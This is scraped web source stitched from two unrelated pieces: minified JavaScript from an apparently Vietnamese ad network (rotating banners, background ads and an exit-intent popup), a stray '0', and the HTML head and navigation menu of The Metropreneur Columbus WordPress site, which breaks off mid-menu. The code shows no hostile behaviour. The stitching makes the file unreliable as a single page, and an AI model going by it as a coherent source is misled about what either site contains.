class="adx-cell">',n+=this.adObjects[t].renderHTML(),n+="<\/div><\/div>",this.padding>0&&t<this.length-1&&(n+='<div style=":height:'+this.padding+'px" class="adx-sep-v"><\/div>');return n+="<\/div>",n+="<\/div>",__rendered=1,n}return r=this.currentAdId,n+='<div id="'+this.Id+'" >',n+=this.adObjects[this.currentAdId].renderHTML(),n+="<\/div>",__rendered=1,n},show:function(){if(__rendered==1){var n=__getEL(this.Id);n.style.display="inline"}},hide:function(){try{var n=__getEL(this.Id);n.style.display="none"}catch(t){}},renderIn:function(n){var t=__getEL(n);t&&(t.innerHTML=this.renderHTML())}};MetaNET_SharingAdObject2.prototype={renderHTML:function(){var n="",i=0,r,u,t;if(this.length==0)return"";if(this.interval>0){if(n+=this.adObjects[0].width>0&&this.adObjects[0].height>0?"<div id='"+this.Id+"' >":"<div id='"+this.Id+"'>",n+="<div style='position:relative;height:auto;width:auto;'>",this.length>1){for(i=0;i<this.length;i++)n+="<div id='"+this.Id+"_SLIDE_"+i+"' style='position:absolute;top:0px;left:0px;display:none;'>",n+=this.adObjects[i].renderHTML(),n+="<\/div>";n+="<script type='text/javascript'>";n+=""+this.Id+"__play();";n+="<\/script>"}return n+="<\/div><\/div>",__rendered=1,n}if(this.interval<0){if(r=this.direction.toLowerCase(),r=="doc"||r=="vertical"||r=="d"||r=="0"?r="v":(r=="n"||r=="horizontal"||r=="ngang"||r=="1")&&(r="h"),u=this.length,u>4&&(u=4),n+="<div id='"+this.Id+"'>",t=this.currentAdId,n+='<div class="adx-zone">',r=="h"){for(n+='<div class="adx-row">',i=0;i<u;i++)n+=this.adObjects[t].width>0&&this.adObjects[t].height>0?'<div class="adx-cell" >':'<div class="adx-cell">',n+=this.adObjects[t].renderHTML(),n+="<\/div>",this.padding>0&&i<u-1&&(n+='<div style="width:'+this.padding+'" class="adx-sep-v"><\/div>'),t++,t>=this.length&&(t=0);n+="<\/div>"}else if(r=="v")for(i=0;i<u;i++)n+=this.adObjects[t].width>0&&this.adObjects[t].height>0?'<div class="adx-row"><div class="adx-cell" >':'<div class="adx-row"><div class="adx-cell" >',n+=this.adObjects[t].renderHTML(),n+="<\/div><\/div>",this.padding>0&&i<u-1&&(n+='<div style="height:'+this.padding+'" class="adx-sep-h"><\/div>'),t++,t>=this.length&&(t=0);return n+="<\/div>",n+="<\/div>",__rendered=1,n}return t=this.currentAdId,n+=this.adObjects[t].width>0&&this.adObjects[t].height>0?'<div id="'+this.Id+'" >':"<div id='"+this.Id+"'>",n+=this.adObjects[t].renderHTML(),n+="<\/div>",__rendered=1,n},show:function(){if(__rendered==1){var n=__getEL(this.Id);n.style.display="inline"}},hide:function(){try{var n=__getEL(this.Id);n.style.display="none"}catch(t){}},renderIn:function(n){var t=__getEL(n);t&&(t.innerHTML=this.renderHTML())}};AD_BG_START=!1;MetaNET_BgAds_Settings={fixedType:"top",centerWidth:1e3,leftOffset:1,rightOffset:1,topOffset:1,bottomOffset:1,zIndex:100,isFixed:!0,bgColor:"",height:0,leftBannerId:"BG_leftBanner",rightBannerId:"BG_rightBanner"};MetaNET_BgAds=function(n,t,i){var r,e;if(n!=null||t!=null){r=MetaNET_BgAds_Settings;i==null||typeof i=="undefined"?i=r:((i.fixedType==null||typeof i.fixedType=="undefined")&&(i.fixedType=r.fixedType),(i.centerWidth==null||typeof i.centerWidth=="undefined")&&(i.centerWidth=r.centerWidth),(i.leftOffset==null||typeof i.leftOffset=="undefined")&&(i.leftOffset=r.leftOffset),(i.rightOffset==null||typeof i.rightOffset=="undefined")&&(i.rightOffset=r.rightOffset),(i.topOffset==null||typeof i.topOffset=="undefined")&&(i.topOffset=r.topOffset),(i.bottomOffset==null||typeof i.bottomOffset=="undefined")&&(i.bottomOffset=r.bottomOffset),(i.zIndex==null||typeof i.zIndex=="undefined")&&(i.zIndex=r.zIndex),(i.isFixed==null||typeof i.isFixed=="undefined")&&(i.isFixed=r.isFixed),(i.bgColor==null||typeof i.bgColor=="undefined")&&(i.bgColor=r.bgColor),(i.leftBannerId==null||typeof i.leftBannerId=="undefined")&&(i.leftBannerId=r.leftBannerId),(i.rightBannerId==null||typeof i.rightBannerId=="undefined")&&(i.rightBannerId=r.rightBannerId));e="top:0px";i.fixedType=="bottom"&&(e="bottom:"+i.bottomOffset+"px");var b='<div style="position:relative;width:100%;height:100%;display:block"><div style="position:absolute;right:'+i.rightOffset+"px;"+e+'">'+(n==null?"":n.renderHTML())+"<\/div><\/div>",k='<div style="position:relative;width:100%;height:100%;display:block"><div style="position:absolute;left:'+i.leftOffset+"px;"+e+'">'+(t==null?"":t.renderHTML())+"<\/div><\/div>",s=i.leftBannerId,h=i.rightBannerId,c=i.centerWidth,l=$(window).width(),a=i.height==0?$(window).height():i.height,d=i.leftOffset,g=i.rightOffset,nt=i.zIndex,tt=i.topOffset,v=i.isFixed,o=i.bgColor,y=(l-c)/2,p=!1,w=!1,u=document.createElement("div"),f=document.createElement("div");document.getElementById(s)&&(u=document.getElementById(s),p=!0);document.getElementById(h)&&(f=document.getElementById(h),w=!0);o!=""&&$("body").css("background-color",o);l<=c+100?($(u).css("display","none"),$(f).css("display","none")):($(u).css("display",""),$(f).css("display",""));try{$.browser.msie&&$.browser.version.substr(0,1)<7&&(v=!1)}catch(it){}v?($(u).css("position","fixed"),$(f).css("position","fixed")):($(u).css("position","absolute"),$(f).css("position","absolute"));$(u).css("top","0").css("left","0").css("height",a).css("width",y).css("background",o).css("overflow","hidden").attr("id",s);$(f).css("top","0").css("right","0").css("height",a).css("width",y).css("background",o).css("overflow","hidden").attr("id",h);p||$(u).appendTo("body");w||$(f).appendTo("body");AD_BG_START||($(u).append(b),$(f).append(k));AD_BG_START=!0}};MetaNET_BgAds2=function(n,t){if(n.length>2){var i="__BGADS_";this.currentAdId=0;this.currentAdId=__getCookie(i)==""||__getCookie(i)==null?Math.floor(Math.random()*(n.length/2)):parseInt(__getCookie(i))+1;this.currentAdId>=n.length/2&&(this.currentAdId=0);__setCookie(i,this.currentAdId,1);MetaNET_BgAds(n[this.currentAdId*2],n[this.currentAdId*2+1],t)}else MetaNET_BgAds(n[0],n[1],t)},function(n,t){typeof define=="function"&&define.amd?define(t):typeof exports=="object"?module.exports=t(require,exports,module):n.ouibounce=t()}(this,function(){return function(n,t){"use strict";function e(n,t){return typeof n=="undefined"?t:n}function y(n){var i=n*864e5,t=new Date;return t.setTime(t.getTime()+i),"; expires="+t.toUTCString()}function it(){s()||(r.addEventListener("mouseleave",p),r.addEventListener("mouseenter",w),r.addEventListener("keydown",b))}function p(n){n.clientY>g||(u=setTimeout(h,c))}function w(){u&&(clearTimeout(u),u=null)}function b(n){o||n.metaKey&&n.keyCode===76&&(o=!0,u=setTimeout(h,c))}function rt(n,t){return ut()[n]===t}function ut(){for(var t,i=document.cookie.split("; "),r={},n=i.length-1;n>=0;n--)t=i[n].split("="),r[t[0]]=t[1];return r}function s(){return rt(f,"true")&&!d}function h(){s()||(n&&(n.style.display="block"),tt(),k())}function k(n){var t=n||{};typeof t.cookieExpire!="undefined"&&(l=y(t.cookieExpire));t.sitewide===!0&&(v=";path=/");typeof t.cookieDomain!="undefined"&&(a=";domain="+t.cookieDomain);typeof t.cookieName!="undefined"&&(f=t.cookieName);document.cookie=f+"=true"+l+a+v;r.removeEventListener("mouseleave",p);r.removeEventListener("mouseenter",w);r.removeEventListener("keydown",b)}var i=t||{},d=i.aggressive||!1,g=e(i.sensitivity,20),nt=e(i.timer,1e3),c=e(i.delay,0),tt=i.callback||function(){},l=y(i.cookieExpire)||"",a=i.cookieDomain?";domain="+i.cookieDomain:"",f=i.cookieName?i.cookieName:"_vom",v=i.sitewide===!0?";path=/":"",u=null,r=document.documentElement,o;return setTimeout(it,nt),o=!1,{fire:h,disable:k,isDisabled:s}}}),function(){var t,n;if(!($(window).width()<800)&&!($(window).height()<500)){$('<link rel="stylesheet" href="/scripts/outbounce/ouibounce.min.css" />').appendTo("head");t='<div id="ouibounce-modal"><div class="underlay"><\/div><div class="modal"><a class="outclose" title="Đóng lại">Đóng X<\/a><div class="modal-body"><div id="adsoutbounce" data-realclickzone="407"><\/div><\/div><\/div><\/div>';$("body").append(t);n=ouibounce(document.getElementById("ouibounce-modal"),{cookieExpire:1,timer:0,callback:function(){n.disable({cookieExpire:1,sitewide:!0});console.log("ouiBounce fired!")}});$(".underlay,.outclose").on("click",function(){$("#ouibounce-modal").hide();n.disable({cookieExpire:1,sitewide:!0})});$("#ouibounce-modal .modal").on("click",function(){$("#ouibounce-modal").hide()});setTimeout(function(){$("#adsoutbounce").children().length<1&&(n.disable({cookieExpire:1,sitewide:!0}),$("#ouibounce-modal").remove())},5e3)}}();$(".meta-ads").each(function(){$(this).data("ajx","/cache.aspx?_path=http://meta.vn/ajx/Ajx_TopProducts2.aspx");loadMetaAds($(this))});$("div[data-realclickzone]").each(function(){var n=$(this),t=n.attr("data-realclickzone");n.is("[id]")||n.attr("id","adzid"+t);n.is("[data-minwidth]")&&parseInt(n.attr("data-minwidth"))>$(window).width()||n.is("[data-maxwidth]")&&parseInt(n.attr("data-maxwidth"))<$(window).width()?(n.remove(),console.log("NotDisplayZone:"+t)):__add_banner({type:"zone",id:t,output:n.attr("id")})});$(window).width()>1160&&navigator.userAgent.indexOf("MSIE")<0&&__add_banner({type:"background",id:"gamevui.com",output:"body"});__load_banners(),function(){document.addEventListener("DOMContentLoaded",function(){var n,t,i;if(document.getElementsByClassName||(document.getElementsByClassName=function(n){for(var r=document.getElementsByTagName("a"),t=[],u=0,i;i=r[u++];)i.className==n?t[t.length]=i:null;return t}),n=document.getElementsByClassName("dmca-badge"),n[0].getAttribute("href").indexOf("refurl")<0)for(t=0;t<n.length;t++)i=n[t],i.href=i.href+(i.href.indexOf("?")===-1?"?":"&")+"refurl="+document.location},!1)}();
0
<!doctype html > <!--[if IE 8]> <html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]--> <head> <title>Home - The Metropreneur</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="" /> <link rel="icon" type="image/png" href="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/m.png"> <!-- This site is optimized with the Yoast SEO plugin v10.0.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://themetropreneur.com/columbus/" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://themetropreneur.com/columbus/#website","url":"https://themetropreneur.com/columbus/","name":"The Metropreneur","potentialAction":{"@type":"SearchAction","target":"https://themetropreneur.com/columbus/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="2nHX94R1ZZlOm-3vtgw6YvoV7709NEdM9qUpJ2xkVhM" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Metropreneur &raquo; Feed" href="https://themetropreneur.com/columbus/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Metropreneur &raquo; Comments Feed" href="https://themetropreneur.com/columbus/comments/feed/" /> <link rel="alternate" type="text/calendar" title="The Metropreneur &raquo; iCal Feed" href="https://themetropreneur.com/columbus/events/?ical=1" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/themetropreneur.com\/columbus\/wp-includes\/js\/wp-emoji-release.min.js?ver=6ec040"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://themetropreneur.com/columbus/wp-includes/css/dist/block-library/style.min.css?ver=6ec040' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://themetropreneur.com/columbus/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://themetropreneur.com/columbus/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.3' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> .tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902} </style> <link rel='stylesheet' id='wp-pagenavi-css' href='https://themetropreneur.com/columbus/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /> <link rel='stylesheet' id='spu-public-css-css' href='https://themetropreneur.com/columbus/wp-content/plugins/popups/public/assets/css/public.css?ver=1.9.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='google_font_open_sans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=6ec040' type='text/css' media='all' /> <link rel='stylesheet' id='google_font_roboto-css' href='https://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400%2C300&#038;ver=6ec040' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://themetropreneur.com/columbus/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='td-theme-css' href='https://themetropreneur.com/columbus/wp-content/themes/Newspaper/style.css?ver=6.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='td-theme-child-css' href='https://themetropreneur.com/columbus/wp-content/themes/themetropreneur2016/style.css?ver=6.6.1c' type='text/css' media='all' /> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.3'></script> <link rel='https://api.w.org/' href='https://themetropreneur.com/columbus/wp-json/' /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://themetropreneur.com/columbus/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://themetropreneur.com/columbus/' /> <link rel="alternate" type="application/json+oembed" href="https://themetropreneur.com/columbus/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthemetropreneur.com%2Fcolumbus%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://themetropreneur.com/columbus/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthemetropreneur.com%2Fcolumbus%2F&#038;format=xml" /> <meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://themetropreneur.com/columbus"><link rel="https://theeventscalendar.com/" href="https://themetropreneur.com/columbus/wp-json/tribe/events/v1/" /><!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]--> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://themetropreneur.com/columbus/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.8.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <!-- JS generated by theme --> <script> var tdBlocksArray = []; //here we store all the items for the current page //td_block class - each ajax block uses a object of this class for requests function tdBlock() { this.id = ''; this.block_type = 1; //block type id (1-234 etc) this.atts = ''; this.td_column_number = ''; this.td_current_page = 1; // this.post_count = 0; //from wp this.found_posts = 0; //from wp this.max_num_pages = 0; //from wp this.td_filter_value = ''; //current live filter value this.is_ajax_running = false; this.td_user_action = ''; // load more or infinite loader (used by the animation) this.header_color = ''; this.ajax_pagination_infinite_stop = ''; //show load more at page x } // td_js_generator - mini detector (function(){ var htmlTag = document.getElementsByTagName("html")[0]; if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) { htmlTag.className += ' ie10'; } if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) { htmlTag.className += ' ie11'; } if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) { htmlTag.className += ' td-md-is-ios'; } var user_agent = navigator.userAgent.toLowerCase(); if ( user_agent.indexOf("android") > -1 ) { htmlTag.className += ' td-md-is-android'; } if ( -1 !== navigator.userAgent.indexOf('Mac OS X') ) { htmlTag.className += ' td-md-is-os-x'; } if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) { htmlTag.className += ' td-md-is-chrome'; } if ( -1 !== navigator.userAgent.indexOf('Firefox') ) { htmlTag.className += ' td-md-is-firefox'; } if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) { htmlTag.className += ' td-md-is-safari'; } })(); var tdLocalCache = {}; ( function () { "use strict"; tdLocalCache = { data: {}, remove: function (resource_id) { delete tdLocalCache.data[resource_id]; }, exist: function (resource_id) { return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null; }, get: function (resource_id) { return tdLocalCache.data[resource_id]; }, set: function (resource_id, cachedData) { tdLocalCache.remove(resource_id); tdLocalCache.data[resource_id] = cachedData; } }; })(); var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}]; var td_animation_stack_effect="type0"; var tds_animation_stack=true; var td_animation_stack_specific_selectors=".entry-thumb, img"; var td_animation_stack_general_selectors=".td-animation-stack img, .post img"; var td_ajax_url="https:\/\/themetropreneur.com\/columbus\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.6.1"; var td_get_template_directory_uri="https:\/\/themetropreneur.com\/columbus\/wp-content\/themes\/Newspaper"; var tds_snap_menu="smart_snap_mobile"; var tds_logo_on_sticky=""; var tds_header_style=""; var td_please_wait="Please wait..."; var td_email_user_pass_incorrect="User or password incorrect!"; var td_email_user_incorrect="Email or username incorrect!"; var td_email_incorrect="Email incorrect!"; var tds_more_articles_on_post_enable=""; var tds_more_articles_on_post_time_to_wait=""; var tds_more_articles_on_post_pages_distance_from_top=0; var tds_theme_color_site_wide="#4db2ec"; var tds_smart_sidebar="enabled"; var tdThemeName="Newspaper"; var td_magnific_popup_translation_tPrev="Previous (Left arrow key)"; var td_magnific_popup_translation_tNext="Next (Right arrow key)"; var td_magnific_popup_translation_tCounter="%curr% of %total%"; var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded."; var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded."; var td_ad_background_click_link=""; var td_ad_background_click_target=""; </script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4724786-4"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-4724786-4'); </script> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1456930189478{margin-bottom: 35px !important;}.vc_custom_1456930194564{margin-bottom: 35px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <!-- Start GPT Async Tag --> <script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script> <script> var gptadslots = []; var googletag = googletag || {cmd:[]}; </script> <script> googletag.cmd.push(function() { //Adslot 1 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_ATF_Leaderboard_Home', [[320,50],[728,90]], 'div-gpt-ad-8181961-1') .addService(googletag.pubads())); //Adslot 2 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_ATF_UpperSquare_Article', [[300,250]], 'div-gpt-ad-8181961-2') .addService(googletag.pubads())); //Adslot 3 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_BTF_UpperSquare_Homepage', [[300,250]], 'div-gpt-ad-8181961-3') .addService(googletag.pubads())); //Adslot 4 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_BTF_MiddleSquare_Homepage', [[300,250]], 'div-gpt-ad-8181961-4') .addService(googletag.pubads())); //Adslot 5 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_BTF_MiddleLeaderboard_Homepage', [[320,50],[728,90]], 'div-gpt-ad-8181961-5') .addService(googletag.pubads())); //Adslot 6 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_BTF_LowerLeaderboard_Homepage', [[320,50],[728,90]], 'div-gpt-ad-8181961-6') .addService(googletag.pubads())); //Adslot 7 declaration gptadslots.push(googletag.defineSlot('/3902490/Metropreneur_BTF_LowerSquare_Homepage', [[300,250]], 'div-gpt-ad-8181961-7') .addService(googletag.pubads())); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> <!-- End GPT Async Tag --> </head> <body data-rsssl=1 class="home page-template-default page page-id-8902 tribe-no-js wpb-js-composer js-comp-ver-5.7 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div> <div id="td-outer-wrap"> <div class="td-transition-content-and-menu td-mobile-nav-wrap"> <div id="td-mobile-nav"> <!-- mobile menu close --> <div class="td-mobile-close"> <a href="#">CLOSE</a> <div class="td-nav-triangle"></div> </div> <div class="td-mobile-content"> <div class="menu-newspaperheader-container"><ul id="menu-newspaperheader" class=""><li id="menu-item-8909" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-8902 current_page_item menu-item-first menu-item-8909"><a href="https://themetropreneur.com/columbus/" aria-current="page">Home</a></li> <li id="menu-item-8910" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8910"><a href="/">Storytelling</a> <ul class="sub-menu"> <li id="menu-item-8912" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8912"><a href="https://themetropreneur.com/columbus/category/storytelling/business-profiles/">Business Profiles</a></li> <li id="menu-item-8911" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8911"><a href="https://themetropreneur.com/columbus/category/storytelling/at-work/">At Work</a></li> </ul> </li> <li id="menu-item-8913" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8913"><a href="/">Connecting</a> <ul class="sub-menu"> <li id="menu-item-8914" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8914"><a href="/columbus/local-resource-database/">Business Resources</a></li> <li id="menu-item-8915" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8915"><a href="https://themetropreneur.com/columbus/category/connecting/community-support-features/">Entrepreneurial Support</a></li> <li id="menu-item-8922" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8922"><a href="https://themetropreneur.com/columbus/category/connecting/news/upcoming-events/">Upcoming Events</a></li> <li id="menu-item-8917" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8917"><a href="https://themetropreneur.com/columbus/category/connecting/news/">News</a> <ul class="sub-menu"> <li id="menu-item-8919" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8919"><a href="https://themetropreneur.com/columbus/category/connecting/news/crowdfunding-roundup/">Crowdfunding Roundup</a></li> <li id="menu-item-8920" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8920"><a href="https://themetropreneur.com/columbus/category/connecting/news/faqs/">Frequently Asked Questions</a></li> <li id="menu-item-8918" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8918"><a href="https://themetropreneur.com/columbus/category/connecting/news/behind-the-scenes/">Behind the Scenes</a></li> <li id="menu-item-8926" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8926"><a href="https://themetropreneur.com/columbus/category/connecting/news/weekend-roundup/">Weekend News Roundup</a></li> <li id="menu-item-8923" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8923"><a href="https://themetropreneur.com/columbus/category/connecting/news/announcements/">Announcements</a></li> <li id="menu-item-8925" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8925"><a href="https://themetropreneur.com/columbus/category/connecting/news/governance/">Governance</a></li> <li id="menu-item-8924" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8924"><a href="https://themetropreneur.com/columbus/category/connecting/news/expert-perspective/">Expert Perspective</a></li> <li id="menu-item-8921" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8921"><a href="https://themetropreneur.com/columbus/category/connecting/news/event-reviews/">Event Reviews</a></li> </ul> </li> </ul> </li> <li id="menu-item-8927" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8927"><a href="/">Advising</a> <ul class="sub-menu"> <li id="menu-item-8940" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-8940"><a href="https://themetropreneur.com/columbus/category/advising/how-to-articles/">How-To Guides</a> <ul class="sub-menu"> <li id="menu-item-8938" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8938"><a href="https://themetropreneur.com/columbus/category/connecting/news/tips/">Tips of the Trade</a></li> <li id="menu-item-8937" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8937"><a href="https://themetropreneur.com/columbus/category/connecting/news/regional-spotlight/">Regional Spotlight</a></li> <li id="menu-item-8939" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8939"><a href="https://themetropreneur.com/columbus/category/storytelling/trendspotting/">Trendspotting</a></li> </ul> </li> <li id="menu-item-8942" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8942"><a href="https://themetropreneur.com/columbus/category/advising/cbuzz-podcast/">cbuzz Podcast</a></li> <li id="menu-item-8941" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8941"><a href="https://themetropreneur.com/columbus/category/advising/chamber-connection/">Chamber Connection</a></li> <li id="menu-item-8943" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8943"><a 